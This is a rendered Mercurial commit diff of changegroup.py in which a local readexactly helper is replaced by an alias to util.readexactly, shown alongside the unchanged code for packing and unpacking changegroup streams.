##// END OF EJS Templates
util: move 'readexactly' in the util module...
Boris Feld -
r35772:fb0be099 default
parent child Browse files
Show More
@@ -1,1003 +1,996 b''
1 1 # changegroup.py - Mercurial changegroup manipulation functions
2 2 #
3 3 # Copyright 2006 Matt Mackall <mpm@selenic.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import os
11 11 import struct
12 12 import tempfile
13 13 import weakref
14 14
15 15 from .i18n import _
16 16 from .node import (
17 17 hex,
18 18 nullrev,
19 19 short,
20 20 )
21 21
22 22 from . import (
23 23 dagutil,
24 24 error,
25 25 mdiff,
26 26 phases,
27 27 pycompat,
28 28 util,
29 29 )
30 30
31 31 _CHANGEGROUPV1_DELTA_HEADER = "20s20s20s20s"
32 32 _CHANGEGROUPV2_DELTA_HEADER = "20s20s20s20s20s"
33 33 _CHANGEGROUPV3_DELTA_HEADER = ">20s20s20s20s20sH"
34 34
35 def readexactly(stream, n):
36 '''read n bytes from stream.read and abort if less was available'''
37 s = stream.read(n)
38 if len(s) < n:
39 raise error.Abort(_("stream ended unexpectedly"
40 " (got %d bytes, expected %d)")
41 % (len(s), n))
42 return s
35 readexactly = util.readexactly
43 36
44 37 def getchunk(stream):
45 38 """return the next chunk from stream as a string"""
46 39 d = readexactly(stream, 4)
47 40 l = struct.unpack(">l", d)[0]
48 41 if l <= 4:
49 42 if l:
50 43 raise error.Abort(_("invalid chunk length %d") % l)
51 44 return ""
52 45 return readexactly(stream, l - 4)
53 46
54 47 def chunkheader(length):
55 48 """return a changegroup chunk header (string)"""
56 49 return struct.pack(">l", length + 4)
57 50
58 51 def closechunk():
59 52 """return a changegroup chunk header (string) for a zero-length chunk"""
60 53 return struct.pack(">l", 0)
61 54
62 55 def writechunks(ui, chunks, filename, vfs=None):
63 56 """Write chunks to a file and return its filename.
64 57
65 58 The stream is assumed to be a bundle file.
66 59 Existing files will not be overwritten.
67 60 If no filename is specified, a temporary file is created.
68 61 """
69 62 fh = None
70 63 cleanup = None
71 64 try:
72 65 if filename:
73 66 if vfs:
74 67 fh = vfs.open(filename, "wb")
75 68 else:
76 69 # Increase default buffer size because default is usually
77 70 # small (4k is common on Linux).
78 71 fh = open(filename, "wb", 131072)
79 72 else:
80 73 fd, filename = tempfile.mkstemp(prefix="hg-bundle-", suffix=".hg")
81 74 fh = os.fdopen(fd, pycompat.sysstr("wb"))
82 75 cleanup = filename
83 76 for c in chunks:
84 77 fh.write(c)
85 78 cleanup = None
86 79 return filename
87 80 finally:
88 81 if fh is not None:
89 82 fh.close()
90 83 if cleanup is not None:
91 84 if filename and vfs:
92 85 vfs.unlink(cleanup)
93 86 else:
94 87 os.unlink(cleanup)
95 88
96 89 class cg1unpacker(object):
97 90 """Unpacker for cg1 changegroup streams.
98 91
99 92 A changegroup unpacker handles the framing of the revision data in
100 93 the wire format. Most consumers will want to use the apply()
101 94 method to add the changes from the changegroup to a repository.
102 95
103 96 If you're forwarding a changegroup unmodified to another consumer,
104 97 use getchunks(), which returns an iterator of changegroup
105 98 chunks. This is mostly useful for cases where you need to know the
106 99 data stream has ended by observing the end of the changegroup.
107 100
108 101 deltachunk() is useful only if you're applying delta data. Most
109 102 consumers should prefer apply() instead.
110 103
111 104 A few other public methods exist. Those are used only for
112 105 bundlerepo and some debug commands - their use is discouraged.
113 106 """
114 107 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
115 108 deltaheadersize = struct.calcsize(deltaheader)
116 109 version = '01'
117 110 _grouplistcount = 1 # One list of files after the manifests
118 111
119 112 def __init__(self, fh, alg, extras=None):
120 113 if alg is None:
121 114 alg = 'UN'
122 115 if alg not in util.compengines.supportedbundletypes:
123 116 raise error.Abort(_('unknown stream compression type: %s')
124 117 % alg)
125 118 if alg == 'BZ':
126 119 alg = '_truncatedBZ'
127 120
128 121 compengine = util.compengines.forbundletype(alg)
129 122 self._stream = compengine.decompressorreader(fh)
130 123 self._type = alg
131 124 self.extras = extras or {}
132 125 self.callback = None
133 126
134 127 # These methods (compressed, read, seek, tell) all appear to only
135 128 # be used by bundlerepo, but it's a little hard to tell.
136 129 def compressed(self):
137 130 return self._type is not None and self._type != 'UN'
138 131 def read(self, l):
139 132 return self._stream.read(l)
140 133 def seek(self, pos):
141 134 return self._stream.seek(pos)
142 135 def tell(self):
143 136 return self._stream.tell()
144 137 def close(self):
145 138 return self._stream.close()
146 139
147 140 def _chunklength(self):
148 141 d = readexactly(self._stream, 4)
149 142 l = struct.unpack(">l", d)[0]
150 143 if l <= 4:
151 144 if l:
152 145 raise error.Abort(_("invalid chunk length %d") % l)
153 146 return 0
154 147 if self.callback:
155 148 self.callback()
156 149 return l - 4
157 150
158 151 def changelogheader(self):
159 152 """v10 does not have a changelog header chunk"""
160 153 return {}
161 154
162 155 def manifestheader(self):
163 156 """v10 does not have a manifest header chunk"""
164 157 return {}
165 158
166 159 def filelogheader(self):
167 160 """return the header of the filelogs chunk, v10 only has the filename"""
168 161 l = self._chunklength()
169 162 if not l:
170 163 return {}
171 164 fname = readexactly(self._stream, l)
172 165 return {'filename': fname}
173 166
174 167 def _deltaheader(self, headertuple, prevnode):
175 168 node, p1, p2, cs = headertuple
176 169 if prevnode is None:
177 170 deltabase = p1
178 171 else:
179 172 deltabase = prevnode
180 173 flags = 0
181 174 return node, p1, p2, deltabase, cs, flags
182 175
183 176 def deltachunk(self, prevnode):
184 177 l = self._chunklength()
185 178 if not l:
186 179 return {}
187 180 headerdata = readexactly(self._stream, self.deltaheadersize)
188 181 header = struct.unpack(self.deltaheader, headerdata)
189 182 delta = readexactly(self._stream, l - self.deltaheadersize)
190 183 node, p1, p2, deltabase, cs, flags = self._deltaheader(header, prevnode)
191 184 return (node, p1, p2, cs, deltabase, delta, flags)
192 185
193 186 def getchunks(self):
194 187 """returns all the chunks contains in the bundle
195 188
196 189 Used when you need to forward the binary stream to a file or another
197 190 network API. To do so, it parse the changegroup data, otherwise it will
198 191 block in case of sshrepo because it don't know the end of the stream.
199 192 """
200 193 # For changegroup 1 and 2, we expect 3 parts: changelog, manifestlog,
201 194 # and a list of filelogs. For changegroup 3, we expect 4 parts:
202 195 # changelog, manifestlog, a list of tree manifestlogs, and a list of
203 196 # filelogs.
204 197 #
205 198 # Changelog and manifestlog parts are terminated with empty chunks. The
206 199 # tree and file parts are a list of entry sections. Each entry section
207 200 # is a series of chunks terminating in an empty chunk. The list of these
208 201 # entry sections is terminated in yet another empty chunk, so we know
209 202 # we've reached the end of the tree/file list when we reach an empty
210 203 # chunk that was proceeded by no non-empty chunks.
211 204
212 205 parts = 0
213 206 while parts < 2 + self._grouplistcount:
214 207 noentries = True
215 208 while True:
216 209 chunk = getchunk(self)
217 210 if not chunk:
218 211 # The first two empty chunks represent the end of the
219 212 # changelog and the manifestlog portions. The remaining
220 213 # empty chunks represent either A) the end of individual
221 214 # tree or file entries in the file list, or B) the end of
222 215 # the entire list. It's the end of the entire list if there
223 216 # were no entries (i.e. noentries is True).
224 217 if parts < 2:
225 218 parts += 1
226 219 elif noentries:
227 220 parts += 1
228 221 break
229 222 noentries = False
230 223 yield chunkheader(len(chunk))
231 224 pos = 0
232 225 while pos < len(chunk):
233 226 next = pos + 2**20
234 227 yield chunk[pos:next]
235 228 pos = next
236 229 yield closechunk()
237 230
238 231 def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
239 232 # We know that we'll never have more manifests than we had
240 233 # changesets.
241 234 self.callback = prog(_('manifests'), numchanges)
242 235 # no need to check for empty manifest group here:
243 236 # if the result of the merge of 1 and 2 is the same in 3 and 4,
244 237 # no new manifest will be created and the manifest group will
245 238 # be empty during the pull
246 239 self.manifestheader()
247 240 deltas = self.deltaiter()
248 241 repo.manifestlog._revlog.addgroup(deltas, revmap, trp)
249 242 repo.ui.progress(_('manifests'), None)
250 243 self.callback = None
251 244
252 245 def apply(self, repo, tr, srctype, url, targetphase=phases.draft,
253 246 expectedtotal=None):
254 247 """Add the changegroup returned by source.read() to this repo.
255 248 srctype is a string like 'push', 'pull', or 'unbundle'. url is
256 249 the URL of the repo where this changegroup is coming from.
257 250
258 251 Return an integer summarizing the change to this repo:
259 252 - nothing changed or no source: 0
260 253 - more heads than before: 1+added heads (2..n)
261 254 - fewer heads than before: -1-removed heads (-2..-n)
262 255 - number of heads stays the same: 1
263 256 """
264 257 repo = repo.unfiltered()
265 258 def csmap(x):
266 259 repo.ui.debug("add changeset %s\n" % short(x))
267 260 return len(cl)
268 261
269 262 def revmap(x):
270 263 return cl.rev(x)
271 264
272 265 changesets = files = revisions = 0
273 266
274 267 try:
275 268 # The transaction may already carry source information. In this
276 269 # case we use the top level data. We overwrite the argument
277 270 # because we need to use the top level value (if they exist)
278 271 # in this function.
279 272 srctype = tr.hookargs.setdefault('source', srctype)
280 273 url = tr.hookargs.setdefault('url', url)
281 274 repo.hook('prechangegroup',
282 275 throw=True, **pycompat.strkwargs(tr.hookargs))
283 276
284 277 # write changelog data to temp files so concurrent readers
285 278 # will not see an inconsistent view
286 279 cl = repo.changelog
287 280 cl.delayupdate(tr)
288 281 oldheads = set(cl.heads())
289 282
290 283 trp = weakref.proxy(tr)
291 284 # pull off the changeset group
292 285 repo.ui.status(_("adding changesets\n"))
293 286 clstart = len(cl)
294 287 class prog(object):
295 288 def __init__(self, step, total):
296 289 self._step = step
297 290 self._total = total
298 291 self._count = 1
299 292 def __call__(self):
300 293 repo.ui.progress(self._step, self._count, unit=_('chunks'),
301 294 total=self._total)
302 295 self._count += 1
303 296 self.callback = prog(_('changesets'), expectedtotal)
304 297
305 298 efiles = set()
306 299 def onchangelog(cl, node):
307 300 efiles.update(cl.readfiles(node))
308 301
309 302 self.changelogheader()
310 303 deltas = self.deltaiter()
311 304 cgnodes = cl.addgroup(deltas, csmap, trp, addrevisioncb=onchangelog)
312 305 efiles = len(efiles)
313 306
314 307 if not cgnodes:
315 308 repo.ui.develwarn('applied empty changegroup',
316 309 config='warn-empty-changegroup')
317 310 clend = len(cl)
318 311 changesets = clend - clstart
319 312 repo.ui.progress(_('changesets'), None)
320 313 self.callback = None
321 314
322 315 # pull off the manifest group
323 316 repo.ui.status(_("adding manifests\n"))
324 317 self._unpackmanifests(repo, revmap, trp, prog, changesets)
325 318
326 319 needfiles = {}
327 320 if repo.ui.configbool('server', 'validate'):
328 321 cl = repo.changelog
329 322 ml = repo.manifestlog
330 323 # validate incoming csets have their manifests
331 324 for cset in xrange(clstart, clend):
332 325 mfnode = cl.changelogrevision(cset).manifest
333 326 mfest = ml[mfnode].readdelta()
334 327 # store file cgnodes we must see
335 328 for f, n in mfest.iteritems():
336 329 needfiles.setdefault(f, set()).add(n)
337 330
338 331 # process the files
339 332 repo.ui.status(_("adding file changes\n"))
340 333 newrevs, newfiles = _addchangegroupfiles(
341 334 repo, self, revmap, trp, efiles, needfiles)
342 335 revisions += newrevs
343 336 files += newfiles
344 337
345 338 deltaheads = 0
346 339 if oldheads:
347 340 heads = cl.heads()
348 341 deltaheads = len(heads) - len(oldheads)
349 342 for h in heads:
350 343 if h not in oldheads and repo[h].closesbranch():
351 344 deltaheads -= 1
352 345 htext = ""
353 346 if deltaheads:
354 347 htext = _(" (%+d heads)") % deltaheads
355 348
356 349 repo.ui.status(_("added %d changesets"
357 350 " with %d changes to %d files%s\n")
358 351 % (changesets, revisions, files, htext))
359 352 repo.invalidatevolatilesets()
360 353
361 354 if changesets > 0:
362 355 if 'node' not in tr.hookargs:
363 356 tr.hookargs['node'] = hex(cl.node(clstart))
364 357 tr.hookargs['node_last'] = hex(cl.node(clend - 1))
365 358 hookargs = dict(tr.hookargs)
366 359 else:
367 360 hookargs = dict(tr.hookargs)
368 361 hookargs['node'] = hex(cl.node(clstart))
369 362 hookargs['node_last'] = hex(cl.node(clend - 1))
370 363 repo.hook('pretxnchangegroup',
371 364 throw=True, **pycompat.strkwargs(hookargs))
372 365
373 366 added = [cl.node(r) for r in xrange(clstart, clend)]
374 367 phaseall = None
375 368 if srctype in ('push', 'serve'):
376 369 # Old servers can not push the boundary themselves.
377 370 # New servers won't push the boundary if changeset already
378 371 # exists locally as secret
379 372 #
380 373 # We should not use added here but the list of all change in
381 374 # the bundle
382 375 if repo.publishing():
383 376 targetphase = phaseall = phases.public
384 377 else:
385 378 # closer target phase computation
386 379
387 380 # Those changesets have been pushed from the
388 381 # outside, their phases are going to be pushed
389 382 # alongside. Therefor `targetphase` is
390 383 # ignored.
391 384 targetphase = phaseall = phases.draft
392 385 if added:
393 386 phases.registernew(repo, tr, targetphase, added)
394 387 if phaseall is not None:
395 388 phases.advanceboundary(repo, tr, phaseall, cgnodes)
396 389
397 390 if changesets > 0:
398 391
399 392 def runhooks():
400 393 # These hooks run when the lock releases, not when the
401 394 # transaction closes. So it's possible for the changelog
402 395 # to have changed since we last saw it.
403 396 if clstart >= len(repo):
404 397 return
405 398
406 399 repo.hook("changegroup", **pycompat.strkwargs(hookargs))
407 400
408 401 for n in added:
409 402 args = hookargs.copy()
410 403 args['node'] = hex(n)
411 404 del args['node_last']
412 405 repo.hook("incoming", **pycompat.strkwargs(args))
413 406
414 407 newheads = [h for h in repo.heads()
415 408 if h not in oldheads]
416 409 repo.ui.log("incoming",
417 410 "%s incoming changes - new heads: %s\n",
418 411 len(added),
419 412 ', '.join([hex(c[:6]) for c in newheads]))
420 413
421 414 tr.addpostclose('changegroup-runhooks-%020i' % clstart,
422 415 lambda tr: repo._afterlock(runhooks))
423 416 finally:
424 417 repo.ui.flush()
425 418 # never return 0 here:
426 419 if deltaheads < 0:
427 420 ret = deltaheads - 1
428 421 else:
429 422 ret = deltaheads + 1
430 423 return ret
431 424
432 425 def deltaiter(self):
433 426 """
434 427 returns an iterator of the deltas in this changegroup
435 428
436 429 Useful for passing to the underlying storage system to be stored.
437 430 """
438 431 chain = None
439 432 for chunkdata in iter(lambda: self.deltachunk(chain), {}):
440 433 # Chunkdata: (node, p1, p2, cs, deltabase, delta, flags)
441 434 yield chunkdata
442 435 chain = chunkdata[0]
443 436
444 437 class cg2unpacker(cg1unpacker):
445 438 """Unpacker for cg2 streams.
446 439
447 440 cg2 streams add support for generaldelta, so the delta header
448 441 format is slightly different. All other features about the data
449 442 remain the same.
450 443 """
451 444 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
452 445 deltaheadersize = struct.calcsize(deltaheader)
453 446 version = '02'
454 447
455 448 def _deltaheader(self, headertuple, prevnode):
456 449 node, p1, p2, deltabase, cs = headertuple
457 450 flags = 0
458 451 return node, p1, p2, deltabase, cs, flags
459 452
460 453 class cg3unpacker(cg2unpacker):
461 454 """Unpacker for cg3 streams.
462 455
463 456 cg3 streams add support for exchanging treemanifests and revlog
464 457 flags. It adds the revlog flags to the delta header and an empty chunk
465 458 separating manifests and files.
466 459 """
467 460 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
468 461 deltaheadersize = struct.calcsize(deltaheader)
469 462 version = '03'
470 463 _grouplistcount = 2 # One list of manifests and one list of files
471 464
472 465 def _deltaheader(self, headertuple, prevnode):
473 466 node, p1, p2, deltabase, cs, flags = headertuple
474 467 return node, p1, p2, deltabase, cs, flags
475 468
476 469 def _unpackmanifests(self, repo, revmap, trp, prog, numchanges):
477 470 super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog,
478 471 numchanges)
479 472 for chunkdata in iter(self.filelogheader, {}):
480 473 # If we get here, there are directory manifests in the changegroup
481 474 d = chunkdata["filename"]
482 475 repo.ui.debug("adding %s revisions\n" % d)
483 476 dirlog = repo.manifestlog._revlog.dirlog(d)
484 477 deltas = self.deltaiter()
485 478 if not dirlog.addgroup(deltas, revmap, trp):
486 479 raise error.Abort(_("received dir revlog group is empty"))
487 480
488 481 class headerlessfixup(object):
489 482 def __init__(self, fh, h):
490 483 self._h = h
491 484 self._fh = fh
492 485 def read(self, n):
493 486 if self._h:
494 487 d, self._h = self._h[:n], self._h[n:]
495 488 if len(d) < n:
496 489 d += readexactly(self._fh, n - len(d))
497 490 return d
498 491 return readexactly(self._fh, n)
499 492
500 493 class cg1packer(object):
501 494 deltaheader = _CHANGEGROUPV1_DELTA_HEADER
502 495 version = '01'
503 496 def __init__(self, repo, bundlecaps=None):
504 497 """Given a source repo, construct a bundler.
505 498
506 499 bundlecaps is optional and can be used to specify the set of
507 500 capabilities which can be used to build the bundle. While bundlecaps is
508 501 unused in core Mercurial, extensions rely on this feature to communicate
509 502 capabilities to customize the changegroup packer.
510 503 """
511 504 # Set of capabilities we can use to build the bundle.
512 505 if bundlecaps is None:
513 506 bundlecaps = set()
514 507 self._bundlecaps = bundlecaps
515 508 # experimental config: bundle.reorder
516 509 reorder = repo.ui.config('bundle', 'reorder')
517 510 if reorder == 'auto':
518 511 reorder = None
519 512 else:
520 513 reorder = util.parsebool(reorder)
521 514 self._repo = repo
522 515 self._reorder = reorder
523 516 self._progress = repo.ui.progress
524 517 if self._repo.ui.verbose and not self._repo.ui.debugflag:
525 518 self._verbosenote = self._repo.ui.note
526 519 else:
527 520 self._verbosenote = lambda s: None
528 521
529 522 def close(self):
530 523 return closechunk()
531 524
532 525 def fileheader(self, fname):
533 526 return chunkheader(len(fname)) + fname
534 527
535 528 # Extracted both for clarity and for overriding in extensions.
536 529 def _sortgroup(self, revlog, nodelist, lookup):
537 530 """Sort nodes for change group and turn them into revnums."""
538 531 # for generaldelta revlogs, we linearize the revs; this will both be
539 532 # much quicker and generate a much smaller bundle
540 533 if (revlog._generaldelta and self._reorder is None) or self._reorder:
541 534 dag = dagutil.revlogdag(revlog)
542 535 return dag.linearize(set(revlog.rev(n) for n in nodelist))
543 536 else:
544 537 return sorted([revlog.rev(n) for n in nodelist])
545 538
546 539 def group(self, nodelist, revlog, lookup, units=None):
547 540 """Calculate a delta group, yielding a sequence of changegroup chunks
548 541 (strings).
549 542
550 543 Given a list of changeset revs, return a set of deltas and
551 544 metadata corresponding to nodes. The first delta is
552 545 first parent(nodelist[0]) -> nodelist[0], the receiver is
553 546 guaranteed to have this parent as it has all history before
554 547 these changesets. In the case firstparent is nullrev the
555 548 changegroup starts with a full revision.
556 549
557 550 If units is not None, progress detail will be generated, units specifies
558 551 the type of revlog that is touched (changelog, manifest, etc.).
559 552 """
560 553 # if we don't have any revisions touched by these changesets, bail
561 554 if len(nodelist) == 0:
562 555 yield self.close()
563 556 return
564 557
565 558 revs = self._sortgroup(revlog, nodelist, lookup)
566 559
567 560 # add the parent of the first rev
568 561 p = revlog.parentrevs(revs[0])[0]
569 562 revs.insert(0, p)
570 563
571 564 # build deltas
572 565 total = len(revs) - 1
573 566 msgbundling = _('bundling')
574 567 for r in xrange(len(revs) - 1):
575 568 if units is not None:
576 569 self._progress(msgbundling, r + 1, unit=units, total=total)
577 570 prev, curr = revs[r], revs[r + 1]
578 571 linknode = lookup(revlog.node(curr))
579 572 for c in self.revchunk(revlog, curr, prev, linknode):
580 573 yield c
581 574
582 575 if units is not None:
583 576 self._progress(msgbundling, None)
584 577 yield self.close()
585 578
586 579 # filter any nodes that claim to be part of the known set
587 580 def prune(self, revlog, missing, commonrevs):
588 581 rr, rl = revlog.rev, revlog.linkrev
589 582 return [n for n in missing if rl(rr(n)) not in commonrevs]
590 583
591 584 def _packmanifests(self, dir, mfnodes, lookuplinknode):
592 585 """Pack flat manifests into a changegroup stream."""
593 586 assert not dir
594 587 for chunk in self.group(mfnodes, self._repo.manifestlog._revlog,
595 588 lookuplinknode, units=_('manifests')):
596 589 yield chunk
597 590
598 591 def _manifestsdone(self):
599 592 return ''
600 593
601 594 def generate(self, commonrevs, clnodes, fastpathlinkrev, source):
602 595 '''yield a sequence of changegroup chunks (strings)'''
603 596 repo = self._repo
604 597 cl = repo.changelog
605 598
606 599 clrevorder = {}
607 600 mfs = {} # needed manifests
608 601 fnodes = {} # needed file nodes
609 602 changedfiles = set()
610 603
611 604 # Callback for the changelog, used to collect changed files and manifest
612 605 # nodes.
613 606 # Returns the linkrev node (identity in the changelog case).
614 607 def lookupcl(x):
615 608 c = cl.read(x)
616 609 clrevorder[x] = len(clrevorder)
617 610 n = c[0]
618 611 # record the first changeset introducing this manifest version
619 612 mfs.setdefault(n, x)
620 613 # Record a complete list of potentially-changed files in
621 614 # this manifest.
622 615 changedfiles.update(c[3])
623 616 return x
624 617
625 618 self._verbosenote(_('uncompressed size of bundle content:\n'))
626 619 size = 0
627 620 for chunk in self.group(clnodes, cl, lookupcl, units=_('changesets')):
628 621 size += len(chunk)
629 622 yield chunk
630 623 self._verbosenote(_('%8.i (changelog)\n') % size)
631 624
632 625 # We need to make sure that the linkrev in the changegroup refers to
633 626 # the first changeset that introduced the manifest or file revision.
634 627 # The fastpath is usually safer than the slowpath, because the filelogs
635 628 # are walked in revlog order.
636 629 #
637 630 # When taking the slowpath with reorder=None and the manifest revlog
638 631 # uses generaldelta, the manifest may be walked in the "wrong" order.
639 632 # Without 'clrevorder', we would get an incorrect linkrev (see fix in
640 633 # cc0ff93d0c0c).
641 634 #
642 635 # When taking the fastpath, we are only vulnerable to reordering
643 636 # of the changelog itself. The changelog never uses generaldelta, so
644 637 # it is only reordered when reorder=True. To handle this case, we
645 638 # simply take the slowpath, which already has the 'clrevorder' logic.
646 639 # This was also fixed in cc0ff93d0c0c.
647 640 fastpathlinkrev = fastpathlinkrev and not self._reorder
648 641 # Treemanifests don't work correctly with fastpathlinkrev
649 642 # either, because we don't discover which directory nodes to
650 643 # send along with files. This could probably be fixed.
651 644 fastpathlinkrev = fastpathlinkrev and (
652 645 'treemanifest' not in repo.requirements)
653 646
654 647 for chunk in self.generatemanifests(commonrevs, clrevorder,
655 648 fastpathlinkrev, mfs, fnodes, source):
656 649 yield chunk
657 650 mfs.clear()
658 651 clrevs = set(cl.rev(x) for x in clnodes)
659 652
660 653 if not fastpathlinkrev:
661 654 def linknodes(unused, fname):
662 655 return fnodes.get(fname, {})
663 656 else:
664 657 cln = cl.node
665 658 def linknodes(filerevlog, fname):
666 659 llr = filerevlog.linkrev
667 660 fln = filerevlog.node
668 661 revs = ((r, llr(r)) for r in filerevlog)
669 662 return dict((fln(r), cln(lr)) for r, lr in revs if lr in clrevs)
670 663
671 664 for chunk in self.generatefiles(changedfiles, linknodes, commonrevs,
672 665 source):
673 666 yield chunk
674 667
675 668 yield self.close()
676 669
677 670 if clnodes:
678 671 repo.hook('outgoing', node=hex(clnodes[0]), source=source)
679 672
680 673 def generatemanifests(self, commonrevs, clrevorder, fastpathlinkrev, mfs,
681 674 fnodes, source):
682 675 """Returns an iterator of changegroup chunks containing manifests.
683 676
684 677 `source` is unused here, but is used by extensions like remotefilelog to
685 678 change what is sent based in pulls vs pushes, etc.
686 679 """
687 680 repo = self._repo
688 681 mfl = repo.manifestlog
689 682 dirlog = mfl._revlog.dirlog
690 683 tmfnodes = {'': mfs}
691 684
692 685 # Callback for the manifest, used to collect linkrevs for filelog
693 686 # revisions.
694 687 # Returns the linkrev node (collected in lookupcl).
695 688 def makelookupmflinknode(dir, nodes):
696 689 if fastpathlinkrev:
697 690 assert not dir
698 691 return mfs.__getitem__
699 692
700 693 def lookupmflinknode(x):
701 694 """Callback for looking up the linknode for manifests.
702 695
703 696 Returns the linkrev node for the specified manifest.
704 697
705 698 SIDE EFFECT:
706 699
707 700 1) fclnodes gets populated with the list of relevant
708 701 file nodes if we're not using fastpathlinkrev
709 702 2) When treemanifests are in use, collects treemanifest nodes
710 703 to send
711 704
712 705 Note that this means manifests must be completely sent to
713 706 the client before you can trust the list of files and
714 707 treemanifests to send.
715 708 """
716 709 clnode = nodes[x]
717 710 mdata = mfl.get(dir, x).readfast(shallow=True)
718 711 for p, n, fl in mdata.iterentries():
719 712 if fl == 't': # subdirectory manifest
720 713 subdir = dir + p + '/'
721 714 tmfclnodes = tmfnodes.setdefault(subdir, {})
722 715 tmfclnode = tmfclnodes.setdefault(n, clnode)
723 716 if clrevorder[clnode] < clrevorder[tmfclnode]:
724 717 tmfclnodes[n] = clnode
725 718 else:
726 719 f = dir + p
727 720 fclnodes = fnodes.setdefault(f, {})
728 721 fclnode = fclnodes.setdefault(n, clnode)
729 722 if clrevorder[clnode] < clrevorder[fclnode]:
730 723 fclnodes[n] = clnode
731 724 return clnode
732 725 return lookupmflinknode
733 726
734 727 size = 0
735 728 while tmfnodes:
736 729 dir, nodes = tmfnodes.popitem()
737 730 prunednodes = self.prune(dirlog(dir), nodes, commonrevs)
738 731 if not dir or prunednodes:
739 732 for x in self._packmanifests(dir, prunednodes,
740 733 makelookupmflinknode(dir, nodes)):
741 734 size += len(x)
742 735 yield x
743 736 self._verbosenote(_('%8.i (manifests)\n') % size)
744 737 yield self._manifestsdone()
745 738
746 739 # The 'source' parameter is useful for extensions
747 740 def generatefiles(self, changedfiles, linknodes, commonrevs, source):
748 741 repo = self._repo
749 742 progress = self._progress
750 743 msgbundling = _('bundling')
751 744
752 745 total = len(changedfiles)
753 746 # for progress output
754 747 msgfiles = _('files')
755 748 for i, fname in enumerate(sorted(changedfiles)):
756 749 filerevlog = repo.file(fname)
757 750 if not filerevlog:
758 751 raise error.Abort(_("empty or missing revlog for %s") % fname)
759 752
760 753 linkrevnodes = linknodes(filerevlog, fname)
761 754 # Lookup for filenodes, we collected the linkrev nodes above in the
762 755 # fastpath case and with lookupmf in the slowpath case.
763 756 def lookupfilelog(x):
764 757 return linkrevnodes[x]
765 758
766 759 filenodes = self.prune(filerevlog, linkrevnodes, commonrevs)
767 760 if filenodes:
768 761 progress(msgbundling, i + 1, item=fname, unit=msgfiles,
769 762 total=total)
770 763 h = self.fileheader(fname)
771 764 size = len(h)
772 765 yield h
773 766 for chunk in self.group(filenodes, filerevlog, lookupfilelog):
774 767 size += len(chunk)
775 768 yield chunk
776 769 self._verbosenote(_('%8.i %s\n') % (size, fname))
777 770 progress(msgbundling, None)
778 771
779 772 def deltaparent(self, revlog, rev, p1, p2, prev):
780 773 return prev
781 774
782 775 def revchunk(self, revlog, rev, prev, linknode):
783 776 node = revlog.node(rev)
784 777 p1, p2 = revlog.parentrevs(rev)
785 778 base = self.deltaparent(revlog, rev, p1, p2, prev)
786 779
787 780 prefix = ''
788 781 if revlog.iscensored(base) or revlog.iscensored(rev):
789 782 try:
790 783 delta = revlog.revision(node, raw=True)
791 784 except error.CensoredNodeError as e:
792 785 delta = e.tombstone
793 786 if base == nullrev:
794 787 prefix = mdiff.trivialdiffheader(len(delta))
795 788 else:
796 789 baselen = revlog.rawsize(base)
797 790 prefix = mdiff.replacediffheader(baselen, len(delta))
798 791 elif base == nullrev:
799 792 delta = revlog.revision(node, raw=True)
800 793 prefix = mdiff.trivialdiffheader(len(delta))
801 794 else:
802 795 delta = revlog.revdiff(base, rev)
803 796 p1n, p2n = revlog.parents(node)
804 797 basenode = revlog.node(base)
805 798 flags = revlog.flags(rev)
806 799 meta = self.builddeltaheader(node, p1n, p2n, basenode, linknode, flags)
807 800 meta += prefix
808 801 l = len(meta) + len(delta)
809 802 yield chunkheader(l)
810 803 yield meta
811 804 yield delta
812 805 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
813 806 # do nothing with basenode, it is implicitly the previous one in HG10
814 807 # do nothing with flags, it is implicitly 0 for cg1 and cg2
815 808 return struct.pack(self.deltaheader, node, p1n, p2n, linknode)
816 809
817 810 class cg2packer(cg1packer):
818 811 version = '02'
819 812 deltaheader = _CHANGEGROUPV2_DELTA_HEADER
820 813
821 814 def __init__(self, repo, bundlecaps=None):
822 815 super(cg2packer, self).__init__(repo, bundlecaps)
823 816 if self._reorder is None:
824 817 # Since generaldelta is directly supported by cg2, reordering
825 818 # generally doesn't help, so we disable it by default (treating
826 819 # bundle.reorder=auto just like bundle.reorder=False).
827 820 self._reorder = False
828 821
829 822 def deltaparent(self, revlog, rev, p1, p2, prev):
830 823 dp = revlog.deltaparent(rev)
831 824 if dp == nullrev and revlog.storedeltachains:
832 825 # Avoid sending full revisions when delta parent is null. Pick prev
833 826 # in that case. It's tempting to pick p1 in this case, as p1 will
834 827 # be smaller in the common case. However, computing a delta against
835 828 # p1 may require resolving the raw text of p1, which could be
836 829 # expensive. The revlog caches should have prev cached, meaning
837 830 # less CPU for changegroup generation. There is likely room to add
838 831 # a flag and/or config option to control this behavior.
839 832 return prev
840 833 elif dp == nullrev:
841 834 # revlog is configured to use full snapshot for a reason,
842 835 # stick to full snapshot.
843 836 return nullrev
844 837 elif dp not in (p1, p2, prev):
845 838 # Pick prev when we can't be sure remote has the base revision.
846 839 return prev
847 840 else:
848 841 return dp
849 842
850 843 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
851 844 # Do nothing with flags, it is implicitly 0 in cg1 and cg2
852 845 return struct.pack(self.deltaheader, node, p1n, p2n, basenode, linknode)
853 846
854 847 class cg3packer(cg2packer):
855 848 version = '03'
856 849 deltaheader = _CHANGEGROUPV3_DELTA_HEADER
857 850
858 851 def _packmanifests(self, dir, mfnodes, lookuplinknode):
859 852 if dir:
860 853 yield self.fileheader(dir)
861 854
862 855 dirlog = self._repo.manifestlog._revlog.dirlog(dir)
863 856 for chunk in self.group(mfnodes, dirlog, lookuplinknode,
864 857 units=_('manifests')):
865 858 yield chunk
866 859
867 860 def _manifestsdone(self):
868 861 return self.close()
869 862
870 863 def builddeltaheader(self, node, p1n, p2n, basenode, linknode, flags):
871 864 return struct.pack(
872 865 self.deltaheader, node, p1n, p2n, basenode, linknode, flags)
873 866
874 867 _packermap = {'01': (cg1packer, cg1unpacker),
875 868 # cg2 adds support for exchanging generaldelta
876 869 '02': (cg2packer, cg2unpacker),
877 870 # cg3 adds support for exchanging revlog flags and treemanifests
878 871 '03': (cg3packer, cg3unpacker),
879 872 }
880 873
